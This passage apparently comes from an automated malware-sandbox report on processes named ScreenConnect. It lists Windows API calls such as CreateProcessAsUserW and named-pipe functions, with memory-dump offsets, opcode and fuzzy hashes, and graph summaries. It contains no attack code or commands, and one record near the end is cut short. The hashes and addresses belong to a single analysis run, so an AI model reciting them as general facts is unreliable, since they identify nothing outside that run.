                                                                                              • Opcode ID: feeb3c100e367205b2dd9403508f67f49f1d59a31c5f30e701a882ccb0367581
                                                                                              • Instruction ID: aa23adde7c4cc9ae497e2ea28e09a24a02d4e571c2ce005637cbfaa6dc62ae53
                                                                                              • Opcode Fuzzy Hash: feeb3c100e367205b2dd9403508f67f49f1d59a31c5f30e701a882ccb0367581
                                                                                              • Instruction Fuzzy Hash: C1519F71A007058FCB24CF69D884AAEBBF5FF98310F14896ED46AD7641D734E9058BA1
                                                                                              APIs
                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BE667E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSession
                                                                                              • String ID:
                                                                                              • API String ID: 3779259828-0
                                                                                              • Opcode ID: 39507c2e1fb5ad39204e74288ae88acd00fdd056ee0c5dde3abcb1c2a543483a
                                                                                              • Instruction ID: 4fbfaeb5249990096113dab9c895220990cb5a5fdb23f1180705c76a8758b6e8
                                                                                              • Opcode Fuzzy Hash: 39507c2e1fb5ad39204e74288ae88acd00fdd056ee0c5dde3abcb1c2a543483a
                                                                                              • Instruction Fuzzy Hash: E9312672C093998FDB11DFA9C8847DABFF1EF56214F09459EC498A7242D378A405CBA1
                                                                                              APIs
                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 058302BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcessUser
                                                                                              • String ID:
                                                                                              • API String ID: 2217836671-0
                                                                                              • Opcode ID: 9513021f7a85489f81f920080a5be38674d53843ffd573271b1ad0ca6fe865e8
                                                                                              • Instruction ID: 331d45716fd20afa9a267e7c4445d2de33ef5475f787f091159ac401392c742f
                                                                                              • Opcode Fuzzy Hash: 9513021f7a85489f81f920080a5be38674d53843ffd573271b1ad0ca6fe865e8
                                                                                              • Instruction Fuzzy Hash: 1A4110B6900249DFCF11CFA9C885ADEBBF2FF48310F14842AE918A7250D775AA55CF90
                                                                                              APIs
                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BE667E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSession
                                                                                              • String ID:
                                                                                              • API String ID: 3779259828-0
                                                                                              • Opcode ID: 4035aa4dff4d7bef400e030329d0a89c8573c6e1fb41ea40ad04d6b617ec2ea4
                                                                                              • Instruction ID: 7de02e3511d7480663b108ef56abea0fff492943266ddd92bb6d6b9438de557f
                                                                                              • Opcode Fuzzy Hash: 4035aa4dff4d7bef400e030329d0a89c8573c6e1fb41ea40ad04d6b617ec2ea4
                                                                                              • Instruction Fuzzy Hash: 522134B2C002498FCB10CF9AC8447DEFBF4AB98320F15845AD469A3290D778A945CFA1
                                                                                              APIs
                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 05831EC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: 1cbc83b566e60211303c5c17f0d974e26abf7c05ce455201d489e9baef75e979
                                                                                              • Instruction ID: fdb8f3c09153f8c4cfb71c08c196f90e180cdec440d18aa9195c159fcf537081
                                                                                              • Opcode Fuzzy Hash: 1cbc83b566e60211303c5c17f0d974e26abf7c05ce455201d489e9baef75e979
                                                                                              • Instruction Fuzzy Hash: 8A2135B0D10258DFCB14CFAAD489B9EBBF5BF48700F148469E819A7340CB75A945CFA4
                                                                                              APIs
                                                                                              • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05BE659D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumProcesses
                                                                                              • String ID:
                                                                                              • API String ID: 84517404-0
                                                                                              • Opcode ID: 771a3912b1f052af3555fac8ebe8bca95087ca4137aeb544bef133ffa5746c28
                                                                                              • Instruction ID: c6e0cb3915a75d77686ccbf7a1dd4ac7e2de964459c0856a7a83e6384fa5a75b
                                                                                              • Opcode Fuzzy Hash: 771a3912b1f052af3555fac8ebe8bca95087ca4137aeb544bef133ffa5746c28
                                                                                              • Instruction Fuzzy Hash: 182145B1D002099FDB10CF9AD885BEEFBF5FB48320F14846EE518A7240C338A905CBA4
                                                                                              APIs
                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 05831EC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: 4a0e76f9c9d533b3c1c92780b07cd7496f5ccb64518892a306656107fe9a6eee
                                                                                              • Instruction ID: 6e396e2bd1315bf772cce9ea263d17a7dc4858a062135ab5c463b2ba389d2b7a
                                                                                              • Opcode Fuzzy Hash: 4a0e76f9c9d533b3c1c92780b07cd7496f5ccb64518892a306656107fe9a6eee
                                                                                              • Instruction Fuzzy Hash: 882126B0D00258DFCB14CF9AD489B9EFBF5AF48700F148469E849A7340DB759945CFA0
                                                                                              APIs
                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 0583229F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamedPipeWait
                                                                                              • String ID:
                                                                                              • API String ID: 3146367894-0
                                                                                              • Opcode ID: 7cf66838582d884e1204dd42830390aa8dfe22ccdd350999f58df33c7f334e01
                                                                                              • Instruction ID: 129157d50709901de06c08dd66965b06ffd9f2d192b40e8e06e1d1dcdc6a9d52
                                                                                              • Opcode Fuzzy Hash: 7cf66838582d884e1204dd42830390aa8dfe22ccdd350999f58df33c7f334e01
                                                                                              • Instruction Fuzzy Hash: 252115B68002498FCB10CF99C445AEEFBB5EB48314F14845DD859A7641C739A945CFA0
                                                                                              APIs
                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 0583229F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamedPipeWait
                                                                                              • String ID:
                                                                                              • API String ID: 3146367894-0
                                                                                              • Opcode ID: 7c4ee1e2f3ffa281895be4307006543226e2677ef27f53c2c71ce3935459091d
                                                                                              • Instruction ID: 54cebf2271fb07e7582958e35d41980aa70d51f4ee8e78cd15da06f0bfdb926e
                                                                                              • Opcode Fuzzy Hash: 7c4ee1e2f3ffa281895be4307006543226e2677ef27f53c2c71ce3935459091d
                                                                                              • Instruction Fuzzy Hash: 9121F4B68003498FCB14CF9AC845AEEFBF5FB88320F14846DD859A7641C779A945CFA1
                                                                                              APIs
                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BE667E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSession
                                                                                              • String ID:
                                                                                              • API String ID: 3779259828-0
                                                                                              • Opcode ID: 2892744d003f6a9dc3fc79f445e80837156014ff222eec99e636242b85a18453
                                                                                              • Instruction ID: fc5f8326230bff0e2a649b2c0beb106bec8f764ab71986c1b913c2242a43555d
                                                                                              • Opcode Fuzzy Hash: 2892744d003f6a9dc3fc79f445e80837156014ff222eec99e636242b85a18453
                                                                                              • Instruction Fuzzy Hash: 061130B1C003499FCB10CF9AC844BEEFBF4EB88320F14846AD819A7240C378A944CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b56e6ebc1ec2f8334cff784074d937d8472605e20127ede2027679b2c0456547
                                                                                              • Instruction ID: c74c8f120dbaecb6ab00b13462cc5b8263227d14be4eda2d8adf8d5ab95c59a5
                                                                                              • Opcode Fuzzy Hash: b56e6ebc1ec2f8334cff784074d937d8472605e20127ede2027679b2c0456547
                                                                                              • Instruction Fuzzy Hash: B92137B6904244DFCB05DF14E9C0B26BF65FB98330F24C569E8090B256C336D816EBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                              • Instruction ID: 17a58cf731a0af5de3021be3665fa1c30c61681e388699f2a6c45e7af4a8208b
                                                                                              • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                              • Instruction Fuzzy Hash: BF11E676904280CFCB16CF10D9C4B16BF72FB98334F24C6A9D8090B256C336D85ADBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e11cf1fd0c55a081d269d4959372a31086b81ee37c3c3394499375f12265edc0
                                                                                              • Instruction ID: 4abc494886702d1527dd0aa5a87b718175aa72e68dd516468a5bb9f3f325c514
                                                                                              • Opcode Fuzzy Hash: e11cf1fd0c55a081d269d4959372a31086b81ee37c3c3394499375f12265edc0
                                                                                              • Instruction Fuzzy Hash: 8D012BB28043409AE7144A25ECC4B67BFD8DF51B35F18C419EC190B28AC2799841E7B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 01e453d9dc9d2c7c55b666aa472e54f1ecf2f68713b98a9be45868934eb76e86
                                                                                              • Instruction ID: ec4c834b45ea0b98219c18ec30eb53a619c16e04caabb44cfab6d4408a9bf16b
                                                                                              • Opcode Fuzzy Hash: 01e453d9dc9d2c7c55b666aa472e54f1ecf2f68713b98a9be45868934eb76e86
                                                                                              • Instruction Fuzzy Hash: 14018C6240E3C09ED7128B258C94B52BFB4DF53634F0D80DBE8888F1E7C2699848C772
                                                                                              APIs
                                                                                              • RtlGetVersion.NTDLL(0000009C), ref: 01904DBE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3028043168.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1900000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID: `Q^q
                                                                                              • API String ID: 1889659487-1948671464
                                                                                              • Opcode ID: d947838d102ba93fab9a64c0c650b906d2674e25c4a2865f2b85897241580d8a
                                                                                              • Instruction ID: 6bbbd84cd7186aa9d8c2acbdbb04d17b8ace111ab2b50eb2aad2a47ce1d41735
                                                                                              • Opcode Fuzzy Hash: d947838d102ba93fab9a64c0c650b906d2674e25c4a2865f2b85897241580d8a
                                                                                              • Instruction Fuzzy Hash: B8212571901228DEEB60DF19C844B99FBBAFB05715F0085D9D10CA7680C7756A98CFA2

                                                                                              Execution Graph

                                                                                              Execution Coverage:13.2%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:11
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph (graph rendering omitted): nodes at 7ffd9b288014 and 7ffd9b28801d lead to 7ffd9b2880f6 calling SetProcessMitigationPolicy; node 7ffd9b2a5845 leads to 7ffd9b2a5851 calling CreateNamedPipeW; node 7ffd9b2a59e1 leads to 7ffd9b2a59ef calling ConnectNamedPipe

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph (graph rendering omitted): function starting at 7ffd9b596c90; basic blocks call 7ffd9b5900a8, 7ffd9b590c30, 7ffd9b596a10, 7ffd9b596a48, 7ffd9b593cc0, 7ffd9b5956a8 and 7ffd9b596a38; block edges not reproduced
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: H
                                                                                              • API String ID: 0-2852464175
                                                                                              • Opcode ID: c94204a09687c4b0474729992da195033d4006381639e392f4d50769ef2d7957
                                                                                              • Instruction ID: cfb8d8cbf8b1f06cceb8f6c9893097917d99509ead8b498098a75bbf22270e3a
                                                                                              • Opcode Fuzzy Hash: c94204a09687c4b0474729992da195033d4006381639e392f4d50769ef2d7957
                                                                                              • Instruction Fuzzy Hash: 21421821B0EA4A4FF7E697A884746B977E2EF85340F9A007AD44DC71F7DE29B9058340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21b515a6c0c91c941d3fd5cb87cc67aee37bc22d27a765d90f8dc63700785f17
                                                                                              • Instruction ID: 8b7746f32fb75970044209095d962054863f87b35355004ddf8e2b08031f45d9
                                                                                              • Opcode Fuzzy Hash: 21b515a6c0c91c941d3fd5cb87cc67aee37bc22d27a765d90f8dc63700785f17
                                                                                              • Instruction Fuzzy Hash: 8F024772B0EA4E4BFBFA9B6854742B433E1EF95340F9600B9D85DC71E7DD28A9068341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 018e7c5a27bcf0fd344c6915c3f992513ef4a68dae9653c268a6eed47e79d3b3
                                                                                              • Instruction ID: bd29011c61f556707a1317d50f20d89fddf3e4673a9025c2312af08b1af466b7
                                                                                              • Opcode Fuzzy Hash: 018e7c5a27bcf0fd344c6915c3f992513ef4a68dae9653c268a6eed47e79d3b3
                                                                                              • Instruction Fuzzy Hash: E302E37171DA4A8FEBA9EF288465AB573E1FFA8340F40407ED44EC32A7DE24B9458741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B283000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B283000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b283000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f28859f09520ef15bc0d62c584bb5bf02b00472dcc0a7cf388606947ab6c1a5
                                                                                              • Instruction ID: 05e88fdb71d83c7a0cbb824521089ce7e1c36e7468b1d4c6322bc1c25602384c
                                                                                              • Opcode Fuzzy Hash: 2f28859f09520ef15bc0d62c584bb5bf02b00472dcc0a7cf388606947ab6c1a5
                                                                                              • Instruction Fuzzy Hash: 75D10522F0ED5A4BE779EAAC98716FD3791EF80314F0A01BAD45DC71FBDD28A9418241

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?K_I$K_^^
                                                                                              • API String ID: 0-702756016
                                                                                              • Opcode ID: b95643f6b977dc612596764b72b49dc5544cbcbde6a422198d8c2c6838e2c1ec
                                                                                              • Instruction ID: 6a13d0580393707e0959cd650ce248507cfca5d1992b6ce842b50521bea4cc7b
                                                                                              • Opcode Fuzzy Hash: b95643f6b977dc612596764b72b49dc5544cbcbde6a422198d8c2c6838e2c1ec
                                                                                              • Instruction Fuzzy Hash: 6BD14D2370F98E4FF724AAAD78654EA7B91FFD137471543BBD48CC60ABE91469068380

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: SK_^$UK_I
                                                                                              • API String ID: 0-3158764453
                                                                                              • Opcode ID: dbea9fb42d1700c03628ca0f738c5f92fbbedd83a87acf1353866448a8ba9d7b
                                                                                              • Instruction ID: 927839f623ebd56ae19ec4522ce1949bd0045a5a8c11297f1b49e28b2c0139ce
                                                                                              • Opcode Fuzzy Hash: dbea9fb42d1700c03628ca0f738c5f92fbbedd83a87acf1353866448a8ba9d7b
                                                                                              • Instruction Fuzzy Hash: DB514857B0FAC60FE7629A6CA8B14D97B50EF5122474A02F7D4D88B0EFE9146A078341

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B2A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b2a3000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2489174969-0
                                                                                              • Opcode ID: bc89b94b23ec4f997c94b98b8a183f7fd9f204c61365a498ea5e1f1d0012a602
                                                                                              • Instruction ID: 360945f99ae8bdd1760fa8a5cfba8461e753c09de531967eb3d58727d20e3f47
                                                                                              • Opcode Fuzzy Hash: bc89b94b23ec4f997c94b98b8a183f7fd9f204c61365a498ea5e1f1d0012a602
                                                                                              • Instruction Fuzzy Hash: 9751C17191CA5C9FDB68DF589815BE5BBE0FB59320F0442AEE04DD3252CB34A9858BC2

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B283000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B283000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b283000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: MitigationPolicyProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1088084561-0
                                                                                              • Opcode ID: d8f068d945c9387eecc7900542293ce628dc41a923e4f5df642e7bb73e9588cf
                                                                                              • Instruction ID: d18b8fbbb47611fe908fd659388c12334aef9e9ab21adf142e4dc85c3c8c75f6
                                                                                              • Opcode Fuzzy Hash: d8f068d945c9387eecc7900542293ce628dc41a923e4f5df642e7bb73e9588cf
                                                                                              • Instruction Fuzzy Hash: B1514931D0CB598FEB25AFA8884A9E97BE0EF55311F04017EE449C3192DE78A8468791

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B2A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b2a3000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: df018c5da2eec84316c41d6961d524985a39d3c3e490cb3699d0e5f65a796cdd
                                                                                              • Instruction ID: 5aceed717e05843ec0bba5e9dbe3ad39c022ccb96e42fa2c709ac133b4ff6ed6
                                                                                              • Opcode Fuzzy Hash: df018c5da2eec84316c41d6961d524985a39d3c3e490cb3699d0e5f65a796cdd
                                                                                              • Instruction Fuzzy Hash: 3141B430E08A5D8FDB58EF98C849BE9BBF0FF55311F00426AD448D7296CB74A945CB81

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B283000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B283000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b283000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: MitigationPolicyProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1088084561-0
                                                                                              • Opcode ID: 96609f3e703b6ca1ba19fcaaa67b9a57c74f8f7e80d62d54797321b4f4f6ba9c
                                                                                              • Instruction ID: 12cb08e3ccf0d7d520e9c526d68e1cdbe619712ec20e70f42cfd7fa7d3a366db
                                                                                              • Opcode Fuzzy Hash: 96609f3e703b6ca1ba19fcaaa67b9a57c74f8f7e80d62d54797321b4f4f6ba9c
                                                                                              • Instruction Fuzzy Hash: 6D21D731918B188FDB28AF9D984AAF977E0EB65711F00412EE049D3251DB74B8458B91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Q_H
                                                                                              • API String ID: 0-50712008
                                                                                              • Opcode ID: c2646009a0ede07a89409ff73b2edd2471166912a14b48f0261886db49a7344b
                                                                                              • Instruction ID: 280316203d84b67e26913fc70674fb038825603f6881fa540b5fc47154910755
                                                                                              • Opcode Fuzzy Hash: c2646009a0ede07a89409ff73b2edd2471166912a14b48f0261886db49a7344b
                                                                                              • Instruction Fuzzy Hash: C451B472B1DE4D4FEBA8DA5C88B96BC73D1EF98340B0500BDD45DD32E6DD2AA9028341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AK_L
                                                                                              • API String ID: 0-1013632581
                                                                                              • Opcode ID: ed36a25cfbeb053490e06615b4af9495400392b52796d244eff0831c19840ea9
                                                                                              • Instruction ID: 6e78676fd2234be6577e2aff4b66c3ca1ecac3002ea613230a876e1b95fd94ab
                                                                                              • Opcode Fuzzy Hash: ed36a25cfbeb053490e06615b4af9495400392b52796d244eff0831c19840ea9
                                                                                              • Instruction Fuzzy Hash: 5A414862B1ED8A4FE768FA6CA4A59B833D1FF9834071401BAD45EC71E6DD24BD024382
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AK_L
                                                                                              • API String ID: 0-1013632581
                                                                                              • Opcode ID: d2feb2d0e5ee24164f9cac5a237162e29dd93f552bd195720b9ec8e05abfdcac
                                                                                              • Instruction ID: 3c37b62cd404a3a81118e01740cc573e0fefcd0aa015b43b31740b07736890f2
                                                                                              • Opcode Fuzzy Hash: d2feb2d0e5ee24164f9cac5a237162e29dd93f552bd195720b9ec8e05abfdcac
                                                                                              • Instruction Fuzzy Hash: 63313672B2AE8B4BE768FA6C94A59B833D1FFA43407150179D85EC71EAED24BD024341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4e8141444ee346c9a335247342eb72d90eac82e646722f0fe1169d14481719cc
                                                                                              • Instruction ID: dbd9afa8149c6b90dcc66d2cb48614a5d2b274c80ab3dfd0260b05b861ea2c38
                                                                                              • Opcode Fuzzy Hash: 4e8141444ee346c9a335247342eb72d90eac82e646722f0fe1169d14481719cc
                                                                                              • Instruction Fuzzy Hash: 2D123A32B0EA4A4FE7EAEB6C84756B437E1EF55710F8904BAD48DC71A3DD18A9428340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35ff2823095ef361ee98adda5ffe2fa1d5397437ed46e436628921231409b017
                                                                                              • Instruction ID: 42481090349e64e7bd0e6f59783f5c2f88142d963685ab6597151dd8796d648d
                                                                                              • Opcode Fuzzy Hash: 35ff2823095ef361ee98adda5ffe2fa1d5397437ed46e436628921231409b017
                                                                                              • Instruction Fuzzy Hash: 4F415631B0F6CDAFEB619BAA58745B57BE0EF53716B0501BAD09DC71A3ED086902C702
